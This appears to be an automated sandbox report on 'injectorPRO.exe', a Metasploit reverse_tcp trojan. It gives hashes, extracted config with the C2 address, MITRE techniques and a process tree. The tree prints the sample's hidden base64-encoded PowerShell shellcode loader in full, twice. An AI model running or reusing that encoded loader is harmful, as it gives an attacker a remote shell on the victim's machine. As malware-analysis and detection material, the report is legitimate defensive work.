metasploit | e9ccbf5fa7f41a02d5e1e9d67d29d68a364f73d021926795e656402c6fa0f7e2

General

Target

injectorPRO.exe
Size

17KB
MD5

d1adc890e952aba11a3bf118243d8f49
SHA1

b0656e5cae0c288ddb376e15ca8d9e2e397cfce5
SHA256

e9ccbf5fa7f41a02d5e1e9d67d29d68a364f73d021926795e656402c6fa0f7e2
SHA512

47d026f8bef2695916717f24fa1e41b23fd40331b5c0c938f52e238b254d7f2dd92713b18d595a4f73ccd4543acb631e227d6a00e641a30f587d0878c0b2d127
SSDEEP

384:Y9EEoLO56ayzcMj+s+XY5cUICgjlKYgFI2cl1caXUlciFxwmcLHa7Q:5E8O56lcVs+XYLVYg9cl1caXkciFjc28

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.178.36:9999

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2452	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2452	powershell.exe
2476	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 3060	2360	injectorPRO.exe	31
PID 2360 wrote to memory of 3060	2360	injectorPRO.exe	31
PID 2360 wrote to memory of 3060	2360	injectorPRO.exe	31
PID 3060 wrote to memory of 2452	3060	cmd.exe	32
PID 3060 wrote to memory of 2452	3060	cmd.exe	32
PID 3060 wrote to memory of 2452	3060	cmd.exe	32
PID 2452 wrote to memory of 2476	2452	powershell.exe	33
PID 2452 wrote to memory of 2476	2452	powershell.exe	33
PID 2452 wrote to memory of 2476	2452	powershell.exe	33
PID 2452 wrote to memory of 2476	2452	powershell.exe	33
PID 2476 wrote to memory of 1128	2476	powershell.exe	34
PID 2476 wrote to memory of 1128	2476	powershell.exe	34
PID 2476 wrote to memory of 1128	2476	powershell.exe	34
PID 2476 wrote to memory of 1128	2476	powershell.exe	34
PID 1128 wrote to memory of 2816	1128	csc.exe	35
PID 1128 wrote to memory of 2816	1128	csc.exe	35
PID 1128 wrote to memory of 2816	1128	csc.exe	35
PID 1128 wrote to memory of 2816	1128	csc.exe	35

C:\Users\Admin\AppData\Local\Temp\injectorPRO.exe
"C:\Users\Admin\AppData\Local\Temp\injectorPRO.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JABOAGYAVgBmACAAPQAgACcAJABKAEEARwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABKAEEARwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAYwA2ACwAMAB4AGIAOAAsADAAeABhADMALAAwAHgAYwBhACwAMAB4AGEAOAAsADAAeABiAGIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZAAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGUAZAAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADQANQAsADAAeAAxADMALAAwAHgAMAAzACwAMAB4AGUANgAsADAAeABkADkALAAwAHgANABhACwAMAB4ADQAZQAsADAAeAAxADQALAAwAHgAMwA1ACwAMAB4ADAANQAsADAAeABiADEALAAwAHgAZQA0ACwAMAB4AGMANgAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4ADAAMQAsADAAeABmADcALAAwAHgAYQA4ACwAMAB4ADUAZgAsADAAeAA0ADIALAAwAHgAYQBhACwAMAB4ADcAYwAsADAAeAAyAGIALAAwAHgAMAA2ACwAMAB4ADQANwAsADAAeABmADYALAAwAHgANwA5ACwAMAB4AGIAMgAsADAAeABkAGMALAAwAHgANwBhACwAMAB4ADUANgAsADAAeABiADUALAAwAHgANQA1ACwAMAB4ADMAMAAsADAAeAA4ADAALAAwAHgAZgA4ACwAMAB4ADYANgAsADAAeABmADQALAAwAHgAMABjACwAMAB4ADUANgAsADAAeABhADQALAAwAHgAOQA2ACwAMAB4AGYAMAAsADAAeABhADQALAAwAHgAZgA5ACwAMAB4ADcAOAAsADAAeABjADgALAAwAHgANgA3ACwAMAB4ADAAYwAsADAAeAA3ADgALAAwAHgAMABkACwAMAB4ADMAZQAsADAAeAA3AGEALAAwAHgAOQA1ACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMABmACwAMAB4ADMAYgAsADAAeABmADQALAAwAHgAOQBjACwAMAB4ADUAMgAsADAAeAA4ADAALAAwAHgAZgA1ACwAMAB4ADcAMgAsADAAeABkADkALAAwAHgAYgA4ACwAMAB4ADgAZAAsADAAeABmADcALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeAAyADIALAAwAHgAZgA2ACwAMAB4ADQAZQAsADAAeAAyADYALAAwAHgAZgAyACwAMAB4AGUAMAAsADAAeABlADUALAAwAHgANgAxACwAMAB4ADIAMwAsADAAeAAxADEALAAwAHgAMgA5ACwAMAB4AGMAMQAsADAAeABhADYALAAwAHgAZAA4ACwAMAB4AGIAOQAsADAAeABkAGUALAAwAHgAOQA5ACwAMAB4ADIANQAsADAAeAAwADgALAAwAHgAOQA0ACwAMAB4AGUAZQAsADAAeAA1ADIALAAwAHgAOABhACwAMAB4ADcAYwAsADAAeAAzAGYALAAwAHgAYQA0ACwAMAB4ADIAMQAsADAAeAA0ADEALAAwAHgAOABmACwAMAB4ADIAOQAsADAAeAAzAGIALAAwAHgAOAA1ACwAMAB4ADIAOAAsADAAeABkADEALAAwAHgANABlACwAMAB4AGYAZAAsADAAeAA0AGEALAAwAHgANgBjACwAMAB4ADQAOQAsADAAeABjADYALAAwAHgAMwAxACwAMAB4AGEAYQAsADAAeABkAGMALAAwAHgAZAA5ACwAMAB4ADkAMgAsADAAeAAzADkALAAwAHgANAA2ACwAMAB4ADMAZQAsADAAeAAyADIALAAwAHgAZQBlACwAMAB4ADEAMQAsADAAeABiADUALAAwAHgAMgA4ACwAMAB4ADUAYgAsADAAeAA1ADUALAAwAHgAOQAxACwAMAB4ADIAYwAsADAAeAA1AGEALAAwAHgAYgBhACwAMAB4AGEAOQAsADAAeAA0ADkALAAwAHgAZAA3ACwAMAB4ADMAZAAsADAAeAA3AGUALAAwAHgAZAA4ACwAMAB4AGEAMwAsADAAeAAxADkALAAwAHgANQBhACwAMAB4ADgAMAAsADAAeAA3ADAALAAwAHgAMAAzACwAMAB4AGYAYgAsADAAeAA2AGMALAAwAHgAZAA3ACwAMAB4ADMAYwAsADAAeAAxAGIALAAwAHgAYwA4ACwAMAB4ADgAOAAsADAAeAA5ADgALAAwAHgANQA3ACwAMAB4AGYAYgAsADAAeABkAGYALAAwAHgAOQBkACwAMAB4ADkANwAsADAAeAAwADMALAAwAHgAZQAwACwAMAB4AGMAMwAsADAAeAAwAGYALAAwAHgAYwBmACwAMAB4ADIAYwAsADAAeABmAGMALAAwAHgAYwBmACwAMAB4ADQANwAsADAAeAAyADcALAAwAHgAOABmACwAMAB4AGYAZAAsADAAeABjADgALAAwAHgAOQAzACwAMAB4ADAANwAsADAAeAA0AGUALAAwAHgAOAAwACwAMAB4ADMAZAAsADAAeABkAGYALAAwAHgAYwA3ACwAMAB4ADgANgAsADAAeABiAGUALAAwAHgAMABmACwAMAB4ADYAZgAsADAAeABjADYALAAwAHgANAAxACwAMAB4AGIAMAAsADAAeAA5ADAALAAwAHgAYwBlACwAMAB4ADgANQAsADAAeABlADQALAAwAHgAYwAwACwAMAB4ADcAOAAsADAAeAAyAGMALAAwAHgAOAA1ACwAMAB4ADgAYQAsADAAeAA3ADgALAAwAHgAZAAxACwAMAB4ADUAMAAsADAAeAAyADYALAAwAHgANwAzACwAMAB4ADQANQAsADAAeAA5AGIALAAwAHgAMQBmACwAMAB4ADMAMQAsADAAeABiADEALAAwAHgANwAzACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgAOQBlACwAMAB4ADgAYwAsADAAeABlAGIALAAwAHgAZAAwACwAMAB4AGIAMAAsADAAeABjADIALAAwAHgAYgBiACwAMAB4ADQAYwAsADAAeAA3ADAALAAwAHgAYgAzACwAMAB4ADcAYgAsADAAeAAzAGQALAAwAHgAMQA4ACwAMAB4AGQAOQAsADAAeAA3ADMALAAwAHgANgAyACwAMAB4ADMAOAAsADAAeABlADIALAAwAHgANQA5ACwAMAB4ADAAYgAsADAAeABkADIALAAwAHgAMABkACwAMAB4ADMANAAsADAAeAA2ADMALAAwAHgANABhACwAMAB4AGIANwAsADAAeAAxAGQALAAwAHgAZgBmACwAMAB4AGUAYgAsADAAeAAzADgALAAwAHgAOAA4ACwAMAB4ADgANQAsADAAeAAyAGIALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAA3ADkALAAwAHgAZQA1ACwAMAB4ADMAMwAsADAAeAAzADUALAAwAHgANgA5ACwAMAB4ADkAMQAsADAAeABiADMALAAwAHgAMAAwACwAMAB4AGQAMwAsADAAeAAzADcALAAwAHgAYwBiACwAMAB4AGIAZQAsADAAeAA3AGUALAAwAHgAYgA3ACwAMAB4ADUAOQAsADAAeAA0ADUALAAwAHgAMgA5ACwAMAB4AGUAMAAsADAAeABmADUALAAwAHgANAA3ACwAMAB4ADAAYwAsADAAeABjADYALAAwAHgANQA5ACwAMAB4AGIANwAsADAAeAA3AGIALAAwAHgANQBkACwAMAB4ADUAMwAsADAAeAAyAGQALAAwAHgAYwA0ACwAMAB4ADAAOQAsADAAeAA5AGMALAAwAHgAYQAxACwAMAB4AGMANAAsADAAeABjADkALAAwAHgAYwBhACwAMAB4AGEAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGEAYQAsADAAeAA4AGYALAAwAHgAOQA2ACwAMAB4AGQANAAsADAAeABiADQALAAwAHgAMAA1ACwAMAB4ADgAYgAsADAAeAA0ADUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeABmAGEALAAwAHgAMwBhACwAMAB4AGUAMgAsADAAeABjAGUALAAwAHgAMAAwACwAMAB4ADYANQAsADAAeABjADQALAAwAHgANQAwACwAMAB4AGYAYQAsADAAeAA0ADAALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAAyAGQALAAwAHgAYQBjACwAMAB4AGEAMgAsADAAeABkAGYALAAwAHgAZQBkADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAB5ADYARQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeQA2AEUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHkANgBFACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQATgBmAFYAZgApACkAOwAkAHEAbwBPAHcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAB1ADcAcwBxACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHUANwBzAHEAIAAkAHEAbwBPAHcAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcQBvAE8AdwAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JABOAGYAVgBmACAAPQAgACcAJABKAEEARwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABKAEEARwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAYwA2ACwAMAB4AGIAOAAsADAAeABhADMALAAwAHgAYwBhACwAMAB4AGEAOAAsADAAeABiAGIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZAAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGUAZAAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADQANQAsADAAeAAxADMALAAwAHgAMAAzACwAMAB4AGUANgAsADAAeABkADkALAAwAHgANABhACwAMAB4ADQAZQAsADAAeAAxADQALAAwAHgAMwA1ACwAMAB4ADAANQAsADAAeABiADEALAAwAHgAZQA0ACwAMAB4AGMANgAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4ADAAMQAsADAAeABmADcALAAwAHgAYQA4ACwAMAB4ADUAZgAsADAAeAA0ADIALAAwAHgAYQBhACwAMAB4ADcAYwAsADAAeAAyAGIALAAwAHgAMAA2ACwAMAB4ADQANwAsADAAeABmADYALAAwAHgANwA5ACwAMAB4AGIAMgAsADAAeABkAGMALAAwAHgANwBhACwAMAB4ADUANgAsADAAeABiADUALAAwAHgANQA1ACwAMAB4ADMAMAAsADAAeAA4ADAALAAwAHgAZgA4ACwAMAB4ADYANgAsADAAeABmADQALAAwAHgAMABjACwAMAB4ADUANgAsADAAeABhADQALAAwAHgAOQA2ACwAMAB4AGYAMAAsADAAeABhADQALAAwAHgAZgA5ACwAMAB4ADcAOAAsADAAeABjADgALAAwAHgANgA3ACwAMAB4ADAAYwAsADAAeAA3ADgALAAwAHgAMABkACwAMAB4ADMAZQAsADAAeAA3AGEALAAwAHgAOQA1ACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMABmACwAMAB4ADMAYgAsADAAeABmADQALAAwAHgAOQBjACwAMAB4ADUAMgAsADAAeAA4ADAALAAwAHgAZgA1ACwAMAB4ADcAMgAsADAAeABkADkALAAwAHgAYgA4ACwAMAB4ADgAZAAsADAAeABmADcALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeAAyADIALAAwAHgAZgA2ACwAMAB4ADQAZQAsADAAeAAyADYALAAwAHgAZgAyACwAMAB4AGUAMAAsADAAeABlADUALAAwAHgANgAxACwAMAB4ADIAMwAsADAAeAAxADEALAAwAHgAMgA5ACwAMAB4AGMAMQAsADAAeABhADYALAAwAHgAZAA4ACwAMAB4AGIAOQAsADAAeABkAGUALAAwAHgAOQA5ACwAMAB4ADIANQAsADAAeAAwADgALAAwAHgAOQA0ACwAMAB4AGUAZQAsADAAeAA1ADIALAAwAHgAOABhACwAMAB4ADcAYwAsADAAeAAzAGYALAAwAHgAYQA0ACwAMAB4ADIAMQAsADAAeAA0ADEALAAwAHgAOABmACwAMAB4ADIAOQAsADAAeAAzAGIALAAwAHgAOAA1ACwAMAB4ADIAOAAsADAAeABkADEALAAwAHgANABlACwAMAB4AGYAZAAsADAAeAA0AGEALAAwAHgANgBjACwAMAB4ADQAOQAsADAAeABjADYALAAwAHgAMwAxACwAMAB4AGEAYQAsADAAeABkAGMALAAwAHgAZAA5ACwAMAB4ADkAMgAsADAAeAAzADkALAAwAHgANAA2ACwAMAB4ADMAZQAsADAAeAAyADIALAAwAHgAZQBlACwAMAB4ADEAMQAsADAAeABiADUALAAwAHgAMgA4ACwAMAB4ADUAYgAsADAAeAA1ADUALAAwAHgAOQAxACwAMAB4ADIAYwAsADAAeAA1AGEALAAwAHgAYgBhACwAMAB4AGEAOQAsADAAeAA0ADkALAAwAHgAZAA3ACwAMAB4ADMAZAAsADAAeAA3AGUALAAwAHgAZAA4ACwAMAB4AGEAMwAsADAAeAAxADkALAAwAHgANQBhACwAMAB4ADgAMAAsADAAeAA3ADAALAAwAHgAMAAzACwAMAB4AGYAYgAsADAAeAA2AGMALAAwAHgAZAA3ACwAMAB4ADMAYwAsADAAeAAxAGIALAAwAHgAYwA4ACwAMAB4ADgAOAAsADAAeAA5ADgALAAwAHgANQA3ACwAMAB4AGYAYgAsADAAeABkAGYALAAwAHgAOQBkACwAMAB4ADkANwAsADAAeAAwADMALAAwAHgAZQAwACwAMAB4AGMAMwAsADAAeAAwAGYALAAwAHgAYwBmACwAMAB4ADIAYwAsADAAeABmAGMALAAwAHgAYwBmACwAMAB4ADQANwAsADAAeAAyADcALAAwAHgAOABmACwAMAB4AGYAZAAsADAAeABjADgALAAwAHgAOQAzACwAMAB4ADAANwAsADAAeAA0AGUALAAwAHgAOAAwACwAMAB4ADMAZAAsADAAeABkAGYALAAwAHgAYwA3ACwAMAB4ADgANgAsADAAeABiAGUALAAwAHgAMABmACwAMAB4ADYAZgAsADAAeABjADYALAAwAHgANAAxACwAMAB4AGIAMAAsADAAeAA5ADAALAAwAHgAYwBlACwAMAB4ADgANQAsADAAeABlADQALAAwAHgAYwAwACwAMAB4ADcAOAAsADAAeAAyAGMALAAwAHgAOAA1ACwAMAB4ADgAYQAsADAAeAA3ADgALAAwAHgAZAAxACwAMAB4ADUAMAAsADAAeAAyADYALAAwAHgANwAzACwAMAB4ADQANQAsADAAeAA5AGIALAAwAHgAMQBmACwAMAB4ADMAMQAsADAAeABiADEALAAwAHgANwAzACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgAOQBlACwAMAB4ADgAYwAsADAAeABlAGIALAAwAHgAZAAwACwAMAB4AGIAMAAsADAAeABjADIALAAwAHgAYgBiACwAMAB4ADQAYwAsADAAeAA3ADAALAAwAHgAYgAzACwAMAB4ADcAYgAsADAAeAAzAGQALAAwAHgAMQA4ACwAMAB4AGQAOQAsADAAeAA3ADMALAAwAHgANgAyACwAMAB4ADMAOAAsADAAeABlADIALAAwAHgANQA5ACwAMAB4ADAAYgAsADAAeABkADIALAAwAHgAMABkACwAMAB4ADMANAAsADAAeAA2ADMALAAwAHgANABhACwAMAB4AGIANwAsADAAeAAxAGQALAAwAHgAZgBmACwAMAB4AGUAYgAsADAAeAAzADgALAAwAHgAOAA4ACwAMAB4ADgANQAsADAAeAAyAGIALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAA3ADkALAAwAHgAZQA1ACwAMAB4ADMAMwAsADAAeAAzADUALAAwAHgANgA5ACwAMAB4ADkAMQAsADAAeABiADMALAAwAHgAMAAwACwAMAB4AGQAMwAsADAAeAAzADcALAAwAHgAYwBiACwAMAB4AGIAZQAsADAAeAA3AGUALAAwAHgAYgA3ACwAMAB4ADUAOQAsADAAeAA0ADUALAAwAHgAMgA5ACwAMAB4AGUAMAAsADAAeABmADUALAAwAHgANAA3ACwAMAB4ADAAYwAsADAAeABjADYALAAwAHgANQA5ACwAMAB4AGIANwAsADAAeAA3AGIALAAwAHgANQBkACwAMAB4ADUAMwAsADAAeAAyAGQALAAwAHgAYwA0ACwAMAB4ADAAOQAsADAAeAA5AGMALAAwAHgAYQAxACwAMAB4AGMANAAsADAAeABjADkALAAwAHgAYwBhACwAMAB4AGEAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGEAYQAsADAAeAA4AGYALAAwAHgAOQA2ACwAMAB4AGQANAAsADAAeABiADQALAAwAHgAMAA1ACwAMAB4ADgAYgAsADAAeAA0ADUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeABmAGEALAAwAHgAMwBhACwAMAB4AGUAMgAsADAAeABjAGUALAAwAHgAMAAwACwAMAB4ADYANQAsADAAeABjADQALAAwAHgANQAwACwAMAB4AGYAYQAsADAAeAA0ADAALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAAyAGQALAAwAHgAYQBjACwAMAB4AGEAMgAsADAAeABkAGYALAAwAHgAZQBkADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAB5ADYARQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeQA2AEUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHkANgBFACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQATgBmAFYAZgApACkAOwAkAHEAbwBPAHcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAB1ADcAcwBxACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHUANwBzAHEAIAAkAHEAbwBPAHcAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcQBvAE8AdwAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2452
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
